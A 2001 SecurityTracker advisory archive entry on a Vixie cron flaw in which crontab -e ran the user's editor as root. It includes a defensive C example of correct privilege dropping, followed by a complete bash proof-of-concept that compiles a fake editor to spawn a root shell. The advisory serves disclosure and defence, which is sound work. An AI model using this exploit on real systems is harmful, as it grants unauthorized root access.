SecurityTracker Archives
Category:   Application (Generic)  >   Cron
Vendors:   Vixie, Paul   (Information on Affected OS Platforms)
Re: Cron Utility Allows Local Users to Obtain Root-Level Privileges
SecurityTracker Alert ID:  1001495
SecurityTracker URL:  http://securitytracker.com/id/1001495
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  May 8 2001
Impact:   Execution of arbitrary code via local system, Root access via local system
Exploit Included:  Yes
Version(s): prior to 3.0pl1-57.3
Description:   A vulnerability was reported in the Vixie cron utility that allows local users to obtain root-level privileges on the host.

It is reported that a recent (fall 2000) security fix to cron introduced this vulnerability. The crontab utility apparently does not properly release its root privileges before invoking the user's editor (crontab -e), so the editor runs with root-level privileges, allowing a local user to execute arbitrary commands on the host as root.

A user indicates that this vulnerability affects "Debian, SuSE, and probably few other Linuxes as well."

A demonstration exploit is attached (see the Source Message). However, the user indicates that the vulnerability can be readily exploited by hand, without any scripting necessary.

Impact:   A local user can execute commands on the host with root-level privileges, thereby obtaining root-level access to the host.
Solution:   This has been fixed in version 3.0pl1-57.3 (or 3.0pl1-67 for unstable). See the Debian Security Advisory in the Source Message for more details.
Vendor URL:  www.debian.org/security/
Cause:   State error
Underlying OS:  Linux (Any)
Underlying OS Comments:  This may only affect Debian, but that has not yet been confirmed
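The cause named above is a setuid program that invokes an editor without first giving up its root privileges. The following is an added example written for this page; it is not cron's own code and does not reproduce the actual patch from the Debian advisory. It shows the pattern a setuid helper such as crontab(1) must follow: drop the group and user IDs permanently (real, effective and saved, via the Linux/glibc setresgid/setresuid calls), verify that root cannot be regained, and only then exec the editor in the child. The editor name, file path and the exit codes 126/127 are assumptions of the example.

```c
#define _GNU_SOURCE            /* getresuid/setresuid are Linux/glibc extensions */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <grp.h>

/* Returns 1 if real, effective and saved IDs all equal the target, else 0.
 * A process that only called seteuid() still has a saved uid of 0 and
 * fails this check, because it can call seteuid(0) again at any time. */
int privileges_are_dropped(uid_t uid, gid_t gid)
{
    uid_t ru, eu, su;
    gid_t rg, eg, sg;
    if (getresuid(&ru, &eu, &su) != 0 || getresgid(&rg, &eg, &sg) != 0)
        return 0;
    return ru == uid && eu == uid && su == uid &&
           rg == gid && eg == gid && sg == gid;
}

/* Permanently drop to uid/gid. Order matters: supplementary groups and the
 * gid must be changed first, because once the uid is no longer 0 the
 * process may not change them any more. Returns 0 on success, -1 if any
 * step failed or if root could still be regained afterwards. */
int drop_privileges(uid_t uid, gid_t gid)
{
    if (geteuid() == 0 && setgroups(0, NULL) != 0)   /* only root may clear groups */
        return -1;
    if (setresgid(gid, gid, gid) != 0)
        return -1;
    if (setresuid(uid, uid, uid) != 0)
        return -1;
    /* Belt and braces: if we can still become root, the drop was not permanent. */
    if (uid != 0 && setuid(0) == 0)
        return -1;
    return privileges_are_dropped(uid, gid) ? 0 : -1;
}

/* Run "editor file" as the invoking user, the way a setuid crontab must.
 * Returns the editor's exit status; 126 if privileges could not be dropped
 * (the editor is then never started), 127 if it could not be executed,
 * and -1 on fork/wait failure. Exit codes are this example's own convention. */
int run_editor_as_user(const char *editor, const char *file, uid_t uid, gid_t gid)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (drop_privileges(uid, gid) != 0)
            _exit(126);               /* never exec the editor with leftover root */
        execlp(editor, editor, file, (char *)NULL);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) != pid)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Demonstration only: "true" stands in for the user's $VISUAL editor. */
    int rc = run_editor_as_user("true", "/dev/null", getuid(), getgid());
    printf("editor exit status: %d\n", rc);
    printf("privileges dropped in this process: %s\n",
           drop_privileges(getuid(), getgid()) == 0 ? "yes" : "no");
    return rc == 0 ? 0 : 1;
}
```

The order of the calls is the point: a helper that merely calls seteuid(getuid()) before exec, or that drops the uid before the gid, leaves a path back to root for whatever it then executes, which is exactly the condition the exploit in the Source Message tests for with its geteuid() check.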

Message History:   This archive entry is a follow-up to the message listed below.
May 8 2001 Cron Utility Allows Local Users to Obtain Root-Level Privileges



 Source Message Contents

Subject:  Re: Vixie cron vulnerability



On Mon, 7 May 2001, Cade Cairns wrote:

> Attached is a simple proof of concept for the vixie cron vulnerability
> recently published in Debian Security Advisory DSA-054-1. The code was
> written during SIA analysis of this vulnerability.

Hm, there is my original proof-of-concept I coded for Sebastian Krahmer
(who discovered this vulnerability), while working on it. This
vulnerability affects Debian, SuSE, and probably few other Linuxes as
well. It is a perfect example of bad coding, and how improper fixing of
bugs might lead to even more dangerous conditions. It is fully automated,
and I believe it gives absolutely nothing to the attacker, as this
vulnerability can be exploited by hand in approximately 5 seconds ;)

Michal Zalewski
http://lcamtuf.coredump.cx


-- SecurityTracker has decoded the MIME attachment for your convenience --

#!/bin/bash

clear
echo ".-----------------------------------------------------------."
echo "| Marchew.Hyperreal presents: vixie crontab exploit #728371 |"
echo "|===========================================================|"
echo "| Sebastian Krahmer <krahmer@security.is>                   |"
echo "| Michal Zalewski <lcamtuf@coredump.cx>                     |"
echo "\`-----------------------------------------------------------'"
echo

test "$CRONBIN" = "" && CRONBIN=/usr/bin/crontab

echo    ">>> Using binary:  $CRONBIN"
echo -n ">>> Setuid check:  "

if [ -u $CRONBIN ]; then
  echo "PASSED"
else
  echo "FAILED"
  echo
  exit 1
fi

echo -n ">>> Version check: "

QQ=`strings $CRONBIN | grep '43 vixie Exp'`

if [ "$QQ" = "" ]; then
  echo "FAILED"
  echo
  exit 1
else
  echo "PASSED"
fi

echo ">>> Building exploit..."

cat >edit0r.c <<_eof_
#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* sleep(), geteuid(), dup2() */
/* Fake "editor" handed to crontab -e via VISUAL. Its behaviour depends on
   the effective uid crontab invoked it with. */
int main(int argc,char* argv[]) {
  sleep(1);
  if (geteuid()) {
    /* Privileges were dropped: just behave like an editor and write the file. */
    FILE* x=fopen(argv[1],"w");
    fprintf(x,"blah blah blah\n");
    fclose(x);
  } else { 
    /* Still euid 0: crontab did not release privileges before the editor. */
    dup2(1,0); 
    dup2(1,2);
    printf("\n>>> Entering rootshell, babe...\n"); 
    system("touch $HOME/.xploited");
    system("bash"); 
  }
  return 0;
}
_eof_

gcc edit0r.c -o edit0r &>/dev/null
rm -f edit0r.c

if [ ! -f edit0r ]; then
  echo ">>> Cannot compile exploit."
  echo
  exit 1
fi

rm -f ~/.xploited

echo ">>> Performing attack..."

( echo "y"; echo "n" ) | VISUAL=$PWD/edit0r $CRONBIN -e 2>/dev/null

rm -f edit0r

if [ -f ~/.xploited ]; then
  echo
  echo ">>> Thank you."
  rm -f ~/.xploited
  echo
  exit 0
else
  echo
  echo ">>> Apparently I am not able to exploit it, sorry..."
  echo
  exit 1
fi


Copyright 2021, SecurityGlobal.net LLC